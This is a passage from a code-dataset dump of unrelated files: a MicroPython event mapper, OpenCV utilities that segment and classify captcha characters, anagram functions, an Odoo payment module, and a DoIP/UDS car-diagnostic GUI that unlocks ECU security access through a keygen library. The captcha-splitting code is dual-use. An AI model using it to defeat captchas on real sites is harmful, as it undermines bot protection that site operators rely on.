mapper.__disposed:\r\n\t\t\t\t\t\tcls.__mappers.remove(mapper)\r\n\t\t\t\t\t\tcontinue\r\n\r\n\t\t\t\t\tif mapper.__forward_args:\r\n\t\t\t\t\t\tmapper.__func(*mapper.__args, 
**mapper.__kw)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tmapper.__func()\r\n\t\t\tpyb.delay(1) # the magic code :)\r\n\r\n\tdef __init__(self, caller, func, *, interrpt_func=None, nargs=None, event=None, forward_args=True):\r\n\t\tif event is None:\r\n\t\t\tevent = type(self).__default_event\r\n\t\tself.__event = event\r\n\t\tself.__caller = caller\r\n\t\tself.__disposed = False\r\n\t\tself.__raised = False\r\n\t\tself.__func = func\r\n\t\tself.__forward_args = forward_args\r\n\t\twrapper = None\r\n\r\n\t\tif nargs is None:\r\n\t\t\tdef var_param_func(*args, **kw):\r\n\t\t\t\tif interrpt_func is not None:\r\n\t\t\t\t\tinterrpt_func()\r\n\t\t\t\tself.__args = args\r\n\t\t\t\tself.__kw = kw\r\n\t\t\t\tself.__raise_event()\r\n\t\t\twrapper = var_param_func\r\n\t\telif nargs == 1:\r\n\t\t\t# when entering interrupt mode, you cannot create the mp object\r\n\t\t\t# required by *args, so we must provide special support for that\r\n\t\t\tself.__kw = {}\r\n\t\t\tself.__args = [None]\r\n\r\n\t\t\tdef one_param_func(arg):\r\n\t\t\t\tif interrpt_func is not None:\r\n\t\t\t\t\tinterrpt_func()\r\n\t\t\t\tif forward_args:\r\n\t\t\t\t\tself.__args[0] = arg\r\n\t\t\t\tself.__raise_event()\r\n\t\t\twrapper = one_param_func\r\n\r\n\t\tcaller(wrapper)\r\n\t\ttype(self).__mappers.append(self)\r\n\t\t# if not type(self).__internal_thread_running:\r\n\t\t#\ttype(self).__internal_thread_running = True\r\n\t\t#\t_thread.start_new_thread(type(self).__internal_thread, [])\r\n\r\n\t@classmethod\r\n\tdef run(cls, *, use_main_thread=False):\r\n\t\tif use_main_thread:\r\n\t\t\tcls.__internal_thread()\r\n\t\telse:\r\n\t\t\tif not cls.__internal_thread_running:\r\n\t\t\t\tcls.__internal_thread_running = True\r\n\t\t\t\t_thread.start_new_thread(cls.__internal_thread, [])\r\n\r\n\tdef __raise_event(self):\r\n\t\tself.__raised = True\r\n\t\tself.__event.set()\r\n\r\n\tdef dispose(self):\r\n\t\tself.__disposed = True\r\n\t\tself.__caller(None)\r\n\t\tself.__raise_event() # wakeup the thread and commit suicide\r\n","sub_path":"cmemgr.py","file_name":"cmemgr.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"185226054","text":"# -*- coding: UTF-8 -*-\n\nimport imutils\nimport cv2\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef resize_to_fit(image, width, height):\n \"\"\"\n A helper function to resize an image to fit within a given size\n :param image: image to resize\n :param width: desired width in pixels\n :param height: desired height in pixels\n :return: the resized image\n \"\"\"\n (h, w) = image.shape[:2]\n if w > h:\n image = imutils.resize(image, width=width)\n\n else:\n image = imutils.resize(image, height=height)\n\n padW = int((width - image.shape[1]) / 2.0)\n padH = int((height - image.shape[0]) / 2.0)\n\n image = cv2.copyMakeBorder(image, padH, padH, padW, padW,\n cv2.BORDER_REPLICATE)\n image = cv2.resize(image, (width, height))\n\n return image\n\n## 获取图片各个验证码的轮廓\ndef findContours(gray):\n thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n contours = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n contours = contours[0] if imutils.is_cv2() else contours[1]\n return contours\n\n## 获取图片各个验证码的位置\ndef findRegions(contours):\n regions = []\n for contour in contours:\n (x, y, w, h) = cv2.boundingRect(contour)\n if w / h > 1.25:\n half_width = int(w / 2)\n regions.append((x, y, half_width, h))\n regions.append((x + half_width, y, half_width, 
h))\n else:\n regions.append((x, y, w, h))\n regions = sorted(regions, key=lambda x: x[0])\n return regions\n\n## 保存切割图片\ndef saveCutImg(gray, counts, saveDir, regions, text):\n for region, code in zip(regions, text):\n x, y, w, h = region\n image = gray[y - 2:y + h + 2, x - 2:x + w + 2]\n save_path = os.path.join(saveDir, code)\n \n if not os.path.exists(save_path):\n os.makedirs(save_path)\n \n count = counts.get(code, 0)\n p = os.path.join(save_path, \"{}.png\".format(str(count).zfill(6)))\n cv2.imwrite(p, image)\n \n counts[code] = counts.get(code, 0) + 1\n return counts\n\n\ndef readTextByStr(txtPath):\n lines = open(txtPath,\"r\", encoding='utf8').readlines() \n ls = \"\"\n for line in lines: \n ls += line.strip('\\n')\n return ls\n\ndef readText(txtPath):\n lines = open(txtPath,\"r\").readlines() \n ls = []\n for line in lines: \n ls.append(line.strip('\\n')) \n return ls\n\ndef readWrite(path, content):\n fo = open(path, \"w\")\n fo.writelines(content)\n fo.close()\n \ndef getLetter(model, img, name_list, IMAGE_SIZE):\n img = cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n img = img.reshape((1, 1, IMAGE_SIZE, IMAGE_SIZE))\n img = img.astype('float32')\n img = img/255.0\n \n result = model.predict_proba(img)\n max_index = np.argmax(result)\n \n picType,prob = max_index,result[0][max_index]\n \n if picType != -1:\n return name_list[picType],prob\n else:\n return \"\"\n \n \ndef extract_peek_ranges_from_array(array_vals, minimun_val=10, minimun_range=2):\n start_i = None\n end_i = None\n peek_ranges = []\n for i, val in enumerate(array_vals):\n if val > minimun_val and start_i is None:\n start_i = i\n elif val > minimun_val and start_i is not None:\n pass\n elif val < minimun_val and start_i is not None:\n end_i = i\n if end_i - start_i >= minimun_range:\n peek_ranges.append((start_i, end_i))\n start_i = None\n end_i = None\n elif val < minimun_val and start_i is None:\n pass\n else:\n raise ValueError(\"cannot parse this case...\")\n return peek_ranges\n\ndef median_split_ranges(peek_ranges):\n new_peek_ranges = []\n widthes = []\n for peek_range in peek_ranges:\n w = peek_range[1] - peek_range[0] + 1\n widthes.append(w)\n widthes = np.asarray(widthes)\n median_w = np.median(widthes)\n for i, peek_range in enumerate(peek_ranges):\n num_char = int(round(widthes[i]/median_w, 0))\n if num_char > 1:\n char_w = float(widthes[i] / num_char)\n for i in range(num_char):\n start_point = peek_range[0] + int(i * char_w)\n end_point = peek_range[0] + int((i + 1) * char_w)\n new_peek_ranges.append((start_point, end_point))\n else:\n new_peek_ranges.append(peek_range)\n return new_peek_ranges\n\ndef get_font_face_peek_ranges(path_test_image):\n image_color = cv2.imread(path_test_image)\n new_shape = (image_color.shape[1] * 2, image_color.shape[0] * 2)\n image_color = cv2.resize(image_color, new_shape)\n image = cv2.cvtColor(image_color, cv2.COLOR_BGR2GRAY)\n \n adaptive_threshold = cv2.adaptiveThreshold(\n image,\n 255,\n cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY_INV, 11, 2)\n \n horizontal_sum = np.sum(adaptive_threshold, axis=1)\n \n# plt.plot(horizontal_sum, range(horizontal_sum.shape[0]))\n# plt.gca().invert_yaxis()\n # plt.show()\n \n peek_ranges = extract_peek_ranges_from_array(horizontal_sum)\n \n vertical_peek_ranges2d = []\n for peek_range in peek_ranges:\n start_y = peek_range[0]\n end_y = peek_range[1]\n line_img = adaptive_threshold[start_y:end_y, :]\n vertical_sum = np.sum(line_img, axis=0)\n vertical_peek_ranges = 
extract_peek_ranges_from_array(\n vertical_sum,\n minimun_val=40,\n minimun_range=1)\n vertical_peek_ranges2d.append(vertical_peek_ranges)\n \n vertical_peek_ranges2d = []\n for peek_range in peek_ranges:\n start_y = peek_range[0]\n end_y = peek_range[1]\n line_img = adaptive_threshold[start_y:end_y, :]\n vertical_sum = np.sum(line_img, axis=0)\n vertical_peek_ranges = extract_peek_ranges_from_array(\n vertical_sum,\n minimun_val=40,\n minimun_range=1)\n vertical_peek_ranges = median_split_ranges(vertical_peek_ranges)\n vertical_peek_ranges2d.append(vertical_peek_ranges)\n return peek_ranges,vertical_peek_ranges2d,image_color\n","sub_path":"demo/font/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"337513668","text":"#!/usr/bin/env python3\n\nfrom collections import Counter\n\n# The official documentation shows that == does indeed compare dictionaries by value, not by address. \\\n#\n# docs.python.org/2/library/stdtypes.html#mapping-types-dict\n\n\ndef are_anagrams_simple_with_counter(string_one, string_two):\n\n return Counter(string_one) == Counter(string_two)\n\n # if Counter(string_one) == Counter(string_two):\n # return True\n # else:\n # return False\n\ndef are_anagrams_simple_with_sorted(string_one, string_two):\n\n return sorted(string_one) == sorted(string_two)\n\n\ndef are_anagrams_with_bit_manipulation(str1, str2):\n\n # If two strings have different size\n if (len(str1) != len(str2)):\n return False;\n\n # To store the xor value\n value = 0;\n\n for i in range(0, len(str1)):\n value = value ^ ord(str1[i]);\n value = value ^ ord(str2[i]);\n\n return value == 0;\n\n\ndef are_anagrams(string_one, string_two):\n\n characters_found = {}\n characters_found2 = {}\n\n for char in string_one:\n try:\n characters_found[char] += 1\n except KeyError:\n characters_found[char] = 1\n print(\"Char: \" + char)\n\n for char2 in string_two:\n try:\n characters_found2[char2] += 1\n except KeyError:\n characters_found2[char2] = 1\n\n if characters_found == characters_found2:\n return True\n else:\n return False\n\n\ndef main():\n print(\"Equal with dict? \" + str(are_anagrams(\"cinema\", \"iceman\")))\n\n print(\"Equal for counter? {}\".format(are_anagrams_simple_with_counter(\"cinema\", \"iceman\")))\n\n print(\"Equal for sorted? {}\".format(are_anagrams_simple_with_sorted(\"cinema\", \"iceman\")))\n\n print(\"Equal for bit manipulation? 
{}\".format(are_anagrams_with_bit_manipulation(\"cinema\", \"iceman\")))\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"PythonPractice/amazon_questions/is_anagram.py","file_name":"is_anagram.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"61613298","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError, ValidationError\nimport base64\nimport io\nimport os\nimport logging\nfrom jinja2 import Environment, FileSystemLoader\nfrom collections import defaultdict\nfrom odoo.addons.account.models.account_payment import account_payment as account_payment_orig\n\nMAP_INVOICE_TYPE_PARTNER_TYPE = {\n 'out_invoice': 'customer',\n 'out_refund': 'customer',\n 'out_receipt': 'customer',\n 'in_invoice': 'supplier',\n 'in_refund': 'supplier',\n 'in_receipt': 'supplier',\n 'liq_purchase': 'supplier',\n 'sale_note': 'customer',\n 'in_debit': 'supplier',\n 'out_debit': 'customer',\n}\n\ntype_account = {\n 'savings': 'AHO',\n 'checking': 'CTE',\n}\n\ntype_ident = {\n 'cedula': 'C',\n 'ruc': 'R',\n 'pasaporte':'P',\n}\n\n \n\nclass account_payment(models.Model):\n _name = \"account.payment\"\n _inherit = \"account.payment\"\n _description = \"Payments\"\n _order = \"payment_date desc, name desc\"\n\n communication = fields.Char(string='Memo', required=True)\n report_bank = fields.Binary(string='Archivo Bancario', readonly=True)\n report_bank_name = fields.Char(string='Nombre Archivo Bancario', store=True)\n account_debit_id = fields.Many2one('account.account', string=\"Cuenta de Debito\")\n sequence_report = fields.Integer('N. Comprobante')\n\n def report_disbursement(self):\n move_ids = []\n invoice_ids = []\n payment_ids = self.env['account.payment'].browse(self._ids)\n sequence_id = self.env['ir.sequence']\n payment_method_id = ''\n partner_id = ''\n check_number = ''\n payment_date = ''\n payment_type = ''\n partner_type = ''\n communication = ''\n journal = ''\n currency_id = ''\n amount = 0\n sequence = ''\n for payment in payment_ids:\n if payment.sequence_report:\n sequence = payment.sequence_report\n amount += payment.amount\n if payment.check_number:\n check_number += str(payment.check_number) + '/ '\n if not partner_id:\n partner_id = payment.partner_id.name\n payment_method_id = {'code':payment.payment_method_id.code,'name':payment.payment_method_id.name}\n payment_date = payment.payment_date\n payment_type = payment.payment_type\n partner_type = payment.partner_type\n communication = payment.communication\n journal = payment.journal_id.name\n currency_id = payment.currency_id\n if payment.payment_method_id.code != payment_method_id['code'] or partner_id != payment.partner_id.name:\n raise ValidationError(_('Debe seleccionar pagos con el mismo método de pago, cliente o proveedor'))\n for invoice in payment.reconciled_invoice_ids:\n invoice_ids.append({\n 'invoice_date':invoice.invoice_date,\n 'number':invoice.invoice_number,\n 'amount_total': invoice.amount_total,\n 'payment': payment._get_invoice_payment_amount(invoice),\n 'residual': invoice.amount_residual,\n })\n for move in payment.move_line_ids:\n move_ids.append({\n 'account_id':move.account_id,\n 'name': move.name,\n 'debit': move.debit,\n 'credit': move.credit,\n })\n if payment_type == 'outbound' and not sequence:\n sequence = sequence_id.next_by_code('comprobante_egreso')\n elif payment_type == 'inbound' and not sequence:\n sequence = 
sequence_id.next_by_code('comprobante_ingreso')\n payment_ids.write({'sequence_report': sequence})\n data = {\n 'payment_date': payment_date,\n 'partner_type': partner_type,\n 'amount': amount,\n 'communication': communication,\n 'journal_id': journal,\n 'reconciled_invoice_ids': invoice_ids,\n 'move_line_ids': move_ids,\n 'partner_id': partner_id,\n 'check_number': check_number,\n 'payment_method_id': payment_method_id,\n 'payment_type': payment_type,\n 'currency_id':currency_id,\n 'sequence':sequence,\n }\n return data\n\n def report_bank_transfer(self):\n bank_id = self.env['res.partner.bank'].search([('partner_id','=',self.partner_id.id)],order=\"id desc\", limit=1)\n if not bank_id:\n raise ValidationError(_(\"%s no tiene registrada una cuenta bancaria.\" % (self.partner_id.name)))\n dtc = []\n data = {'employees':''}\n dtc.append({\n 'identifier':self.partner_id.identifier,\n 'amount':'%.2f'%(self.amount),\n 'type_account':type_account[bank_id.account_type],\n 'account_number':bank_id.acc_number,\n 'reference': self.communication or 'PAGO',\n 'phone':self.partner_id.phone or self.partner_id.mobile,\n 'month':self.payment_date.month,\n 'year':self.payment_date.year,\n 'type_identifier':type_ident[self.partner_id.type_identifier],\n 'name':self.partner_id.name,\n 'code':bank_id.bank_id.bic,\n })\n if not dtc:\n raise ValidationError(_(\"Ninguno de los empleados tiene asignada una cuenta bancaria.\"))\n data = {'employees':dtc}\n if self.journal_id.format_transfer_id:\n tmpl_path = os.path.join(os.path.dirname(__file__), 'template')\n env = Environment(loader=FileSystemLoader(tmpl_path))\n format_report = env.get_template(self.journal_id.format_transfer_id+'.xml')\n report = format_report.render(data)\n buf = io.StringIO()\n buf.write(report)\n out = base64.encodestring(buf.getvalue().encode('utf-8')).decode()\n logging.error(out)\n buf.close()\n self.report_bank = out\n self.report_bank_name = 'Transferencia Bancaria %s.txt' %(self.partner_id.name)\n return out\n else:\n raise ValidationError(_(\"Primero debe configurar un formato de Transferencia Bancaria en el Diario.\"))\n\n @api.model\n def default_get(self, default_fields):\n rec = super(account_payment_orig, self).default_get(default_fields)\n active_ids = self._context.get('active_ids') or self._context.get('active_id')\n active_model = self._context.get('active_model')\n\n # Check for selected invoices ids\n if not active_ids or active_model != 'account.move':\n return rec\n\n invoices = self.env['account.move'].browse(active_ids).filtered(lambda move: move.is_invoice(include_receipts=True))\n\n # Check all invoices are open\n if not invoices or any(invoice.state != 'posted' for invoice in invoices):\n raise UserError(_(\"You can only register payments for open invoices\"))\n # Check if, in batch payments, there are not negative invoices and positive invoices\n dtype = invoices[0].type\n for inv in invoices[1:]:\n if inv.type != dtype:\n if ((dtype == 'in_refund' and inv.type == 'in_invoice') or\n (dtype == 'in_invoice' and inv.type == 'in_refund')):\n raise UserError(_(\"You cannot register payments for vendor bills and supplier refunds at the same time.\"))\n if ((dtype == 'out_refund' and inv.type == 'out_invoice') or\n (dtype == 'out_invoice' and inv.type == 'out_refund')):\n raise UserError(_(\"You cannot register payments for customer invoices and credit notes at the same time.\"))\n\n amount = self._compute_payment_amount(invoices, invoices[0].currency_id, invoices[0].journal_id, rec.get('payment_date') or 
fields.Date.today())\n rec.update({\n 'currency_id': invoices[0].currency_id.id,\n 'amount': abs(amount),\n 'payment_type': 'inbound' if amount > 0 else 'outbound',\n 'partner_id': invoices[0].commercial_partner_id.id,\n 'partner_type': MAP_INVOICE_TYPE_PARTNER_TYPE[invoices[0].type],\n 'communication': invoices[0].invoice_payment_ref or invoices[0].ref or invoices[0].name,\n 'invoice_ids': [(6, 0, invoices.ids)],\n })\n return rec\n\nclass payment_register(models.TransientModel):\n _name = 'account.payment.register'\n _inherit = 'account.payment.register'\n \n def _prepare_payment_vals(self, invoices):\n '''Create the payment values.\n\n :param invoices: The invoices/bills to pay. In case of multiple\n documents, they need to be grouped by partner, bank, journal and\n currency.\n :return: The payment values as a dictionary.\n '''\n amount = self.env['account.payment']._compute_payment_amount(invoices, invoices[0].currency_id, self.journal_id, self.payment_date)\n values = {\n 'journal_id': self.journal_id.id,\n 'payment_method_id': self.payment_method_id.id,\n 'payment_date': self.payment_date,\n 'communication': \" \".join(i.invoice_payment_ref or i.ref or i.name for i in invoices),\n 'invoice_ids': [(6, 0, invoices.ids)],\n 'payment_type': ('inbound' if amount > 0 else 'outbound'),\n 'amount': abs(amount),\n 'currency_id': invoices[0].currency_id.id,\n 'partner_id': invoices[0].commercial_partner_id.id,\n 'partner_type': MAP_INVOICE_TYPE_PARTNER_TYPE[invoices[0].type],\n 'partner_bank_account_id': invoices[0].invoice_partner_bank_id.id,\n }\n return values\n\n def get_payments_vals(self):\n '''Compute the values for payments.\n\n :return: a list of payment values (dictionary).\n '''\n grouped = defaultdict(lambda: self.env[\"account.move\"])\n for inv in self.invoice_ids:\n if self.group_payment:\n grouped[(inv.commercial_partner_id, inv.currency_id, inv.invoice_partner_bank_id, MAP_INVOICE_TYPE_PARTNER_TYPE[inv.type])] += inv\n else:\n grouped[inv.id] += inv\n return [self._prepare_payment_vals(invoices) for invoices in grouped.values()]\n","sub_path":"l10n_ec/models/account_payment.py","file_name":"account_payment.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"593111952","text":"from gui import Ui_MainWindow\nfrom Ecu_Const import get_all_ecu, DIAG_SID, get_ecu_logical_address_by_index\nfrom uds import Uds\nfrom PySide2.QtCore import Signal,QObject\nfrom PySide2.QtWidgets import QApplication, QMainWindow, QAction, QTextBrowser, QTableWidget, QTableWidgetItem\nfrom PySide2.QtWidgets import QHeaderView\nfrom threading import Thread\nfrom ctypes import *\nimport os\n\nclass Main_Ui(Ui_MainWindow):\n\n def __init__(self, MainWindow):\n\n self.setupUi(MainWindow)\n\n self.__globalSignal = GlobalSigals()\n self.__init_all_components()\n self.__init_all_actions()\n # self.__init_uds_settings()\n\n self.__doip_connection_status = False\n\n\n def __init_uds_settings(self):\n \"\"\"\n\n \"\"\"\n self.__ecu_ip_address = self.ecuIpAddressLineEdit.text()\n self.__ecu_logical_address = int(self.ecuLogicalAddressLineEdit.text(), 16)\n self.__tester_ip_address = self.testerIpAddresslineEdit.text()\n self.__tester_logical_address = int(self.testerLogicalAddressLineEdit.text(),16)\n\n print(self.__ecu_ip_address, self.__ecu_logical_address)\n print(self.__tester_ip_address, self.__tester_logical_address)\n\n\n def __init_all_components(self):\n self.__init_sidSeclectBox()\n 
self.__init_ecuSeclectBox()\n self.__set_pushbutton_status(False)\n self.__init_all_signals()\n self.__init_multi_diag_msg_tableWidget()\n\n\n def __init_sidSeclectBox(self):\n self.sidSeclectBox.addItems(DIAG_SID)\n\n def __init_ecuSeclectBox(self):\n self.ecuSeclectBox.addItems(get_all_ecu())\n\n def __set_pushbutton_status(self, isEnable):\n self.sendDiagMsgButton.setEnabled(isEnable)\n self.sendDoipUdpMsgButton.setEnabled(isEnable)\n # self.buildConnectionButton.setEnabled(not isEnable)\n\n\n def __init_all_actions(self):\n self.buildConnectionButton.triggered.connect(self.__init_uds_client_action)\n self.sendDiagMsgButton.clicked.connect(self.__send_diagMsg_action)\n self.diagReqMsgLineEdit.returnPressed.connect(self.__send_diagMsg_action)\n\n self.addLinePushButton.clicked.connect(self.__add_Line_PushButton_action)\n self.clearPushButton.clicked.connect(self.__clear_tableWidget_PushButton_action)\n self.multiSendPushButton.clicked.connect(self.__multi_line_send_PushButton_action)\n\n # self.sendDoipUdpMsgButton.clicked.connect()\n # 具体菜单项\n msgClearOption = QAction(self.DiagMsgPrintBrowser)\n msgClearOption.setText(\"清空\")\n msgClearOption.triggered.connect(self.__clear_all_print_textBrowser) # 点击菜单中的“发送控制代码”执行的函数\n\n # tableView 添加具体的右键菜单\n self.DiagMsgPrintBrowser.addAction(msgClearOption)\n\n def __init_all_signals(self):\n self.__globalSignal.msgPrintBrowserSignal.connect(self.append_msg_to_textBrowser)\n\n def __init_multi_diag_msg_tableWidget(self):\n # self.multiLineTableWidget.insertRow(0)\n # qv = QHeaderView(Horizontal)\n # hh = self.multiLineTableWidget.horizontalHeader()\n # vh = self.multiLineTableWidget.verticalHeaderItem(0)\n # vh.setText('11111')\n # print(self.multiLineTableWidget.rowCount())\n #\n # self.multiLineTableWidget.setVerticalHeaderItem(1)\n # vh = self.multiLineTableWidget.takeVerticalHeaderItem(2)\n # # vh.setText('2222')\n # print(self.multiLineTableWidget.rowCount())\n\n # for i in range(5):\n # self.multiLineTableWidget.insertRow(i)\n # print(self.multiLineTableWidget.rowCount())\n pass\n\n def __init_uds_client_action(self):\n try:\n if not self.__doip_connection_status:\n\n # self.ecu = Uds(transportProtocol=\"DoIP\", ecu_ip=\"127.0.0.1\")\n self.__init_uds_settings()\n self.ecu = Uds(transportProtocol=\"DoIP\", ecu_ip=self.__ecu_ip_address, ecu_logical_address=self.__ecu_logical_address, client_logical_address=self.__tester_logical_address)\n # client_ip_addr, client_port = self.ecu.tp.get_lcoal_doip_connection_info()\n client_ip_addr, client_port = self.ecu.tp.DoIPClient.get_local_tcp_ip_and_port()\n self.testerIpAddresslineEdit.setText(client_ip_addr)\n # self.__udsThread = Thread(target=self.__build_uds_connection)\n # self.__udsThread.start()\n\n self.append_msg_to_infoPrintBrowser('doip connect ok!')\n self.__set_pushbutton_status(True)\n self.buildConnectionButton.setText('断开连接')\n self.__doip_connection_status = True\n else:\n self.ecu.disconnect()\n self.buildConnectionButton.setText('建立连接')\n self.__set_pushbutton_status(False)\n self.__doip_connection_status = False\n self.append_msg_to_infoPrintBrowser('doip disconnect ok!')\n # print('doip disconnect ok!')\n except (ConnectionRefusedError, TimeoutError) as e:\n # print('doip connect error!')\n self.append_msg_to_infoPrintBrowser('doip connect error!')\n\n # def __build_uds_connection(self):\n # self.ecu = Uds(transportProtocol=\"DoIP\", ecu_ip=\"127.0.0.1\")\n\n def __send_diagMsg_action(self):\n print('send diag msg')\n sid = self.sidSeclectBox.currentText()\n # ecuName = 
self.ecuSeclectBox.currentText()\n ecuIndex = self.ecuSeclectBox.currentIndex()\n ecuLogicAddress = get_ecu_logical_address_by_index(ecuIndex)\n self.ecu.tp.DoIPClient.ecu_logical_address = ecuLogicAddress\n\n diagMsgContent = self.diagReqMsgLineEdit.text()\n\n self.diagReqMsgLineEdit.setText(Main_Ui.get_byte_split_msg(diagMsgContent))\n\n self.__send_diagMsg_req_and_get_response(sid, diagMsgContent)\n\n def __add_Line_PushButton_action(self):\n rowCnt = self.multiLineTableWidget.rowCount()\n sid = self.sidLineEdit.text()\n diagData = self.diagDataLineEdit.text()\n\n self.multiLineTableWidget.insertRow(rowCnt)\n self.multiLineTableWidget.setItem(rowCnt, 0, QTableWidgetItem(sid))\n self.multiLineTableWidget.setItem(rowCnt, 1, QTableWidgetItem(diagData))\n\n\n def __clear_tableWidget_PushButton_action(self):\n self.multiLineTableWidget.setRowCount(0)\n\n def __multi_line_send_PushButton_action(self):\n for i in range(self.multiLineTableWidget.rowCount()):\n sid = self.multiLineTableWidget.item(i, 0).text()\n diagData = self.multiLineTableWidget.item(i, 1).text()\n # diagMsg = sid + diagData\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Tx: ', Main_Ui.get_byte_split_msg(diagMsg)))\n self.__send_diagMsg_req_and_get_response(sid, diagData)\n\n def __clear_all_print_textBrowser(self):\n self.DiagMsgPrintBrowser.clear()\n self.InfoPrintBrowser.clear()\n\n def __send_diagMsg_req_and_get_response(self, sid, diagData):\n \"\"\"\n\n :param sid:\n :param diagData:\n \"\"\"\n diagMsgReq = sid + diagData\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Tx: ', Main_Ui.get_byte_split_msg(diagMsgReq)))\n diagMsgReq = Main_Ui.str_DiagMsg2_hex(diagMsgReq)\n\n if diagMsgReq:\n if diagMsgReq[0] == 0x27 and diagMsgReq[1] == 0x01:\n # response = self.ecu.send(diagMsgReq)\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg( Main_Ui.hex_DiagMsg2_str(response))))\n # self.__print_req_response_to_diagMsgPrintBrowser(diagMsgReq, response)\n response = self.__send_doip_msg(diagMsgReq)\n if len(response) == 6 and response[0] == 0x67 and response[1] == 0x01:\n reqWithKey = [0x27, 0x02]\n key = keyGen(response[2:])\n reqWithKey.extend(key)\n # response = self.ecu.send(reqWithKey)\n # self.__print_req_response_to_diagMsgPrintBrowser(reqWithKey, response)\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg(Main_Ui.hex_DiagMsg2_str(response))))\n self.__send_doip_msg(reqWithKey)\n else:\n # response = self.ecu.send(diagMsgReq)\n # self.__print_req_response_to_diagMsgPrintBrowser(diagMsgReq, response)\n # print(response)\n # self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg( Main_Ui.hex_DiagMsg2_str(response))))\n self.__send_doip_msg(diagMsgReq)\n\n def __send_doip_msg(self, diagMsgReq):\n response = self.ecu.send(diagMsgReq)\n self.__print_req_response_to_diagMsgPrintBrowser(diagMsgReq, response)\n\n return response\n\n def __print_req_response_to_diagMsgPrintBrowser(self, diagMsgReq, response):\n self.append_msg_to_diagMsgPrintBrowser(Main_Ui.formatMsg('Tx: ', Main_Ui.get_byte_split_msg(self.hex_DiagMsg2_str(diagMsgReq))))\n self.append_msg_to_diagMsgPrintBrowser(\n Main_Ui.formatMsg('Rx: ', Main_Ui.get_byte_split_msg(Main_Ui.hex_DiagMsg2_str(response))))\n\n def append_msg_to_diagMsgPrintBrowser(self, msg):\n self.__globalSignal.msgPrintBrowserSignal.emit(self.DiagMsgPrintBrowser, msg)\n\n def append_msg_to_infoPrintBrowser(self, msg):\n 
self.__globalSignal.msgPrintBrowserSignal.emit(self.InfoPrintBrowser, msg)\n\n\n def append_msg_to_textBrowser(self, textBrowser, msg):\n \"\"\"\n append msg to textBrowser\n :param textBrowser:\n :param msg:\n \"\"\"\n assert isinstance(textBrowser, QTextBrowser)\n textBrowser.append(msg)\n textBrowser.ensureCursorVisible()\n\n @staticmethod\n def get_byte_split_msg(msg):\n assert isinstance(msg, str)\n msg = msg.replace(' ', '')\n\n if(len(msg)%2):\n msg = msg + '0'\n\n msg = [msg[i:i+2] for i in range(0, len(msg), 2)]\n\n return ' '.join(msg)\n\n @staticmethod\n def formatMsg(fmt, msg):\n return '{0}{1}'.format(fmt, msg)\n\n @staticmethod\n def str_DiagMsg2_hex(strMsg):\n try:\n strMsg = Main_Ui.get_byte_split_msg(strMsg)\n strMsg = strMsg.split(' ')\n # print(strMsg)\n hexMsg = [(int(x, 16)) for x in strMsg]\n # print(hexMsg)\n except TypeError as e:\n hexMsg = None\n\n return hexMsg\n\n @staticmethod\n def hex_DiagMsg2_str(hexMsg):\n\n\n diagRespData = [hex(x)[2:] for x in hexMsg]\n diagRespData = [x.zfill(2) for x in diagRespData]\n\n return ''.join(diagRespData)\n\nclass GlobalSigals(QObject):\n # 定义一种信号,两个参数 类型分别是: QTextBrowser 和 字符串\n # 调用 emit方法 发信号时,传入参数 必须是这里指定的 参数类型\n msgPrintBrowserSignal = Signal(QTextBrowser, str)\n\n # 还可以定义其他种类的信号\n #update_table = Signal(str)\n\n # changeConnectionButtor = Signal(QPushButton, str)\n\n\ndef keyGen(seed_input):\n #print(os.getcwd())\n lib = cdll.LoadLibrary(os.getcwd() + '\\libkeygen.so')\n seed_data = c_char * 4\n seed = seed_data()\n\n for i in range(4):\n seed[i] = seed_input[i]\n\n key_data = c_char * 4\n key = key_data()\n\n lib.GenerateKeyEx(seed, 4, key)\n\n key_output = []\n for i in range(4):\n key_output.append(key[i][0])\n\n return key_output","sub_path":"src/doip_connect/UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":11576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"49871670","text":"palette = [\"#1F77B4\",\"#FF7F0E\",\"#2CA02C\", \"#00A3E0\", '#4943cf', '#1eeca8', '#e52761', '#490b04', '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff', '#a3c1ad', '#a0d6b4', '#5f9ea0', '#317873', '#49796b',\n '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff', '#a3c1ad', '#a0d6b4', '#5f9ea0', '#317873', '#49796b', '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff',\n '#a3c1ad', '#a0d6b4', '#5f9ea0', '#317873', '#49796b', '#ffb3ba', '#ffdfba', '#d0d04a', '#baffc9', '#bae1ff', '#a3c1ad', '#a0d6b4']\nimport sys\nsys.path.insert(0, 'C:/Users/Max 